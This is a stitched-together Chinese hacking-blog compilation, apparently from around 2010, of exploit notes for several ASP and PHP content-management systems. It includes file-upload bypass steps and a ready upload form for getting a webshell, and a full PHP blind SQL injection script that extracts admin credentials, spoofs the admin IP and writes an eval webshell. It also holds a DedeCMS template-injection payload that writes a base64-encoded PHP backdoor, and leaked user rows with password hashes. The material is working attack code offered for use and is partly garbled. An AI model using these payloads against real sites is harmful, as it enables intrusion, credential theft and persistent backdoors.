久久久电脑

FROM http://www.st999.cn/blog  BY 流浪的风   2010/9/28

版本：无忧购物系统ASP通用版 V2010.9.17

漏洞：上传漏洞

关键字：Copyright © 2000-2010 gzwynet.com.cn （若有其他更好的关键字，希望能给我留下言）

利用前提：注册用户

漏洞文件：upfile_Other.asp

其中：

<%
if EnableUploadFile="NO" then
 response.write "系统未开放文件上传功能"
else
 if session("AdminName")="" and session("UserName")="" then
  response.Write("请登录后再使用本功能！")
 else
  select case upload_type
   case 0
    call upload_0()  '使用化境无组件上传类
   case else
    'response.write "本系统未开放插件功能"
    'response.end
  end select
 end if
end if
%>

user，就是注册用户，也存在上传权限，其他的几个文件，如Upfile_Dialog.asp,Upfile_Photo.asp并没有普通用户的上传权限

那么我们现在就是要利用普通用户的这个可以上传的功能。

首先，注册个用户，如果没找到注册的地方，直接在网址后面输入userreg.asp，

注册并登录，

登录之后不要关闭页面，因为是session验证，现在我们打开这个本地上传页面，

修改action后的地址，并给马儿后面添加一个空格，点击上传就可以，图中红色所示部分就是空格，如图所示

复制页面上所示的木马地址，打开即可。

到此，拿到shell，完整结束。

==

附上本地上传的这个页面

本地上传漏洞 by 流浪的风.html

FROM http://www.st999.cn/blog

by 流浪的风

关键字：Copyright © 2008-2009 gzwynet.com.cn

目前仅发现时尚版存在这个上传漏洞，明天有时间再看看其他的版本的。

上传利用地址：admin/upLoad_c.asp?a=uploadfile&b=1

利用文件：

<html>
<head>
<title>无忧购物系统ASP时尚版上传漏洞利用程序 BY 流浪的风</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>

<form name="form1" method="post" action="http://www.st999.cn/admin/upLoad_c1.asp"

enctype="multipart/form-data" >
  <div id="esave" style="position:absolute; top:18px; left:40px; z-index:10; visibility:hidden">
    <TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0>
 <TR><td width=20%></td>
 <TD bgcolor=#104A7B width="60%">
 <TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0>
 <TR>
           <td bgcolor=#eeeeee align=center><font color=red>正在上传文件，请稍候...</font></td>
 </tr>
 </table>
 </td><td width=20%></td>
 </tr>
    </table>
  </div>
  <table width="400" border="0" align="center" cellpadding="0" cellspacing="1"

bordercolorlight="#cccccc" bordercolordark="#CCCCCC" bgcolor="#CCCCCC">
    <tr bgcolor="#CCCCCC">
      <td height="22" align="left" valign="middle" bgcolor="f1f1f1" width="400">&nbsp;文件上传　(允许上

传的文件类型：　jpg　gif)
        <input type="hidden" name="filepath" value="uploadfile/st.asp;">
        <input type="hidden" name="filelx" value="1">
        <input type="hidden" name="EditName" value="">
        <input type="hidden" name="FormName" value="">
        <input type="hidden" name="act" value="uploadfile">
      </td>
    </tr>
    <tr align="center" valign="middle">
      <td width="400" height="80" align="left" bgcolor="#FFFFFF" id="upid"> 选择文件:
        <input type="file" name="file1" style="width:300'" class="tx1" value="">
      </td>
    </tr>
    <tr align="center" valign="middle" bgcolor="#eeeeee">
      <td bgcolor="#eeeeee" height="24" width="400">
        <input type="submit" name="Submit" value="· 开始上传 ·" class="button"

onclick="javascript:mysub()">
      </td>
    </tr>
  </table>
</form>
</body>
</html>

上传一个JPG格式的小马或一句话

上传后的默认地址：admin/uploadfile/st.asp;(文件名)

如图

实际一句话地址：

利用文件：

无忧购物系统asp时尚版上传漏洞利用程序.html

作者:龙儿心[B.H.S.T]

看一个echsop的后台，版本未知。
网上流传的方法都测试了无用，可能是我没找全，无奈只好自己看下后台，发现此方法。
进入后台-系统设置-Flash播放器管理 看图

可以上传任意文件。
结束

经过Fung兄弟的提示和说明，终于让我搞明白了，有时蠢起来真的是无可救药的，笔记一下，以免备忘！

来到access修改工具这里，，创建一个.asp的数据库

执行以下命令

create table hack(cmd image);

insert into hack (cmd) values ('┼癥污爠煥敵瑳∨≡┩>');

不用再导出啦

这样就可以了

果然简单的要命啊

当时就是想不起来

嘿嘿

刚刚不小心看到了凡诺企业管理系统，竟然发现也存在fckeditor上传漏洞，

笔记一下，也许以后会用到。

关键字：

版权所有 2008-2010 凡诺网络

or

程序开发：凡诺网络

fckeditor编辑器地址

http://www.st999.cn/admin/fckeditor/editor/filemanager/connectors/asp/upload.asp

至于怎么利用，大家都知道滴。。。

RT INTO `dede_member` (`mid`, `mtype`, `userid`,
'个人', 'tianya', 'fcea920f7412b5da7be0cf42b8c93759',
'个人', 'wind', 'e10adc3949ba59abbe56e057f20f883e',
'个人', 'like', 'e10adc3949ba59abbe56e057f20f883e', '
'个人', 'yuejie', 'e10adc3949ba59abbe56e057f20f883e',
'个人', '沙羡', 'e10adc3949ba59abbe56e057f20f883e',
'个人', '尐湶細蓅', 'e10adc3949ba59abbe56e057f20f883e'

==

关闭注册时可以试试这几个用户

作者：My5t3ry

老Y文章管理系统 v2.5 sp2的/user/UserLogin.asp文件存在一个SQL注射漏洞，导致恶意用户可以通过漏洞得到数据库的任何数据。另外后台登陆处理不当，导致通过伪造管理账号密码以及管理员IP即可欺骗登陆后台。

漏洞测试exp:
 

<?php
ini_set("max_execution_time",0);
error_reporting(7);
function usage()
{
global $argv;
exit(
"\n--+++============================================================+++--".
"\n--+++==== ".base64_decode("wM9ZzsTVwrncwO3Ptc2zdjIuNXNwMiBCbGluZCBTUUwgSW5qZWN0aW9uIEV4cGxvaXQ=")." ====+++--".
"\n--+++============================================================+++--".
"\n\n[+] Author : My5t3ry".
"\n[+] Team : http://www.t00ls.net".
"\n[+] Blog : http://www.bksec.net".
"\n[+] Usage : php ".$argv[0]." <hostname> <path>".
"\n[+] Ex. : php ".$argv[0]." localhost /".
"\n\n");
}

function query($pos, $chr, $chs)
{
switch ($chs){
case 1:
$query = "admin' or 1=1 and (select asc(mid(Admin_Name,{$pos},1)) from [Yao_Admin] where id=1)={$chr} and '1'='1";
break;
case 2:
$query = "admin' or 1=1 and (select asc(mid(Admin_Pass,{$pos},1)) from [Yao_Admin] where id=1)={$chr} and '1'='1";
break;
case 3:
$query = "admin' or 1=1 and (select len(Admin_Name) from [Yao_Admin] where id=1)={$pos} and '1'='1";
break;
case 4:
$query = "admin' or 1=1 and (select asc(mid(Admin_IP,{$pos},1)) from [Yao_Admin] where id=1)={$chr} and '1'='1";
break;
case 5:
$query = "admin' or 1=1 and (select len(Admin_IP) from [Yao_Admin] where id=1)={$pos} and '1'='1";
break;
}
$query = urlencode($query);
return $query;
}

function exploit($hostname, $path, $pos, $chr, $chs)
{
$chr = ord($chr);
$conn = fsockopen($hostname, 80);
if (!$conn){
exit("\r\n[-] No response from $conn");
}

$postdata = "Username=".query($pos, $chr, $chs)."&PassWord=aaaaaa&Submit=%B5%C7%C2%BC";
$message = "POST ".$path."User/Userlogin.asp?action=login HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: gzip, deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $hostname\r\n";
$message .= "Content-Length: ".strlen($postdata)."\r\n";
$message .= "Cookie: ASPSESSIONIDSSCTBRDD=ILJJFNOABJJHHDMPDBAEJIGC\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $postdata;

fputs($conn, $message);
while (!feof($conn))
$reply .= fgets($conn, 1024);

fclose($conn);
return $reply;
}

function crkusername($hostname, $path, $chs)
{
global $length,$user;
$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$chr = 0;
$pos = 1;
echo "[+] username: ";
while ($pos <= $length)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs);
preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/',$response,$match);

if (strlen(trim($match[1])) != 0)
{
$user .= $key[$chr];
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
}

function crkpassword($hostname, $path, $chs)
{
global $pass;
$key = "abcdef0123456789";
$chr = 0;
$pos = 1;
echo "[+] password: ";
while ($pos <= 18)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs);
preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/',$response,$match);

if (strlen(trim($match[1])) != 0)
{
$pass .= $key[$chr];
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
}

function lengthcolumns($hostname, $path, $chs)
{
$exit = 0;
$length = 0;
$pos = 1;
$chr = 0;
while ($exit==0)
{
$response = exploit($hostname, $path, $pos, $chr, $chs);
preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/',$response,$match);

if (strlen(trim($match[1])) != 0)
{
$exit = 1;
$length = $pos;
}
else
$pos++;
if($pos==20)
exit("\r\n[+] Exploit Failed.\r\n");
}
return $length;
}


function crkadminip($hostname, $path, $chs)
{
global $iplength,$adminip;
$key = "1234567890.";
$chr = 0;
$pos = 1;
echo "[+] adminip: ";
while ($pos <= $iplength)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs);
preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/',$response,$match);

if (strlen(trim($match[1])) != 0)
{
$adminip .= $key[$chr];
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
}

function getshell($hostname, $path, $user, $pass, $adminip)
{
$conn = fsockopen($hostname, 80);

if (!$conn){
exit("\r\n[-] No response from $conn");
}

$postdata = "d_name=user&d_initmode=EDIT&d_fixwidth=&d_skin=light1&d_width=500&d_height=300&d_stateflag=1&d_sbedit=1&d_sbview=1&d_detectfromword=1&d_autoremote=0&d_showborder=0&d_entermode=1&d_areacssmode=0&d_memo=500px%BF%ED%B6%C8%BD%E7%C3%E6%CF%C2%B5%C4%D7%EE%BC%F2%B9%A4%BE%DF%C0%B8%B0%B4%C5%A5%2C%CA%CA%BA%CF%D3%DA%D3%CA%BC%FE%CF%B5%CD%B3%C1%F4%D1%D4%CF%B5%CD%B3%B5%C8%D6%BB%D0%E8%D7%EE%BC%F2%B5%A5%B9%A6%C4%DC%B5%C4%D3%A6%D3%C3&d_uploadobject=0&d_autodir=2&d_allowbrowse=0&d_cusdirflag=0&d_baseurl=1&d_uploaddir=..%2Fuploadfiles%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7C%22%3Aeval%28request%28%22my%22%29%29%27&d_imagesize=0&d_flashext=swf&d_flashsize=0&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=0&d_fileext=rar%7Czip%7Cpdf%7Cdoc%7Cxls%7Cppt%7Cchm%7Chlp&d_filesize=0&d_remoteext=gif%7Cjpg%7Cbmp&d_remotesize=0&d_localext=gif%7Cjpg%7Cbmp%7Cwmz%7Cpng&d_localsize=0&d_sltsyobject=0&d_sltsyext=jpg%7Cjpeg&d_sltflag=0&d_sltminsize=300&d_sltoksize=120&d_sywzflag=0&d_sywzminwidth=100&d_sywzminheight=100&d_sytext=%B0%E6%C8%A8%CB%F9%D3%D0...&d_syfontcolor=000000&d_syshadowcolor=FFFFFF&d_syshadowoffset=1&d_syfontsize=12&d_syfontname=%CB%CE%CC%E5&d_sywzposition=1&d_sywzpaddingh=5&d_sywzpaddingv=5&d_sywztextwidth=66&d_sywztextheight=17&d_sytpflag=0&d_sytpminwidth=100&d_sytpminheight=100&d_sytpposition=1&d_sytppaddingh=5&d_sytppaddingv=5&d_sypicpath=&d_sytpopacity=1&d_sytpimagewidth=88&d_sytpimageheight=31";

$message = "POST ".$path."Admin/EditorAdmin/style.asp?action=StyleSetSave&id=2 HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: gzip, deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $hostname\r\n";
$message .= "X-FORWARDED-FOR: ".$adminip."\r\n";
$message .= "Cookie: ASPSESSIONIDCADSSCQQ=OKLJGOECENDGHDLAKKIKBCAB; LaoYAdmin=UserName=".$user."&UserPass=".$pass."&UserID=1\r\n";
$message .= "Content-Length: ".strlen($postdata)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $postdata;

fputs($conn, $message);
while (!feof($conn))
$reply .= fgets($conn, 1024);

fclose($conn);
return $reply;
}

if ($argc != 3)
usage();
$hostname = $argv[1];
$path = $argv[2];
echo "[+] Len(username): ";
$length = lengthcolumns($hostname, $path, 3);
echo $length."\n";
echo "[+] Len(adminip): ";
$iplength = lengthcolumns($hostname, $path, 5);
echo $iplength."\n";
crkusername($hostname, $path, 1);
crkpassword($hostname, $path, 2);
crkadminip($hostname, $path, 4);
$reply = getshell($hostname, $path, $user, $pass, $adminip);
if(eregi(chr(209).chr(249).chr(202).chr(189).chr(208).chr(222).chr(184).chr(196).chr(179).chr(201).chr(185).chr(166),$reply))
{
echo "[+] Exploit finished.\r\n";
echo "[+] shell:http://".$hostname."/Editor/asp/config.asp?my=response.write(now())\r\n";
}
else
{
echo "[-] Exploit failed.\r\n";
}
?>

关于漏洞分析这里就先不写了，有一点需要注意的是获得webshell后记得到/Editor/asp/config.asp删除写进去的

|":eval(request("my"))'

[localfile=1]

作者：toby57
博客：http://hi.baidu.com/toby57
作者潜伏于论坛多年，不发帖，只能代为转发了。PHP牛人...

因为鸡肋，所以发出来。
说下利用方法：注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行。
生成的解析文件内容如下：

成功效果

漏洞鸡肋之处在于经历上次的0day冲击后，很多站点已经关闭了会员功能或者直接删除了member目录，并且没有多少站会有软件栏目的，嗯 ，所以搞搞 下载站之类的差不多了。

---a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

生成x.php 密码：xiao

下火狐，搜索插件Referrer，安装后在工具那有个选项Referrer，点开就可以伪造Referrer

==========

E创政府管理系统通杀0day---修改Referrer

==t00ls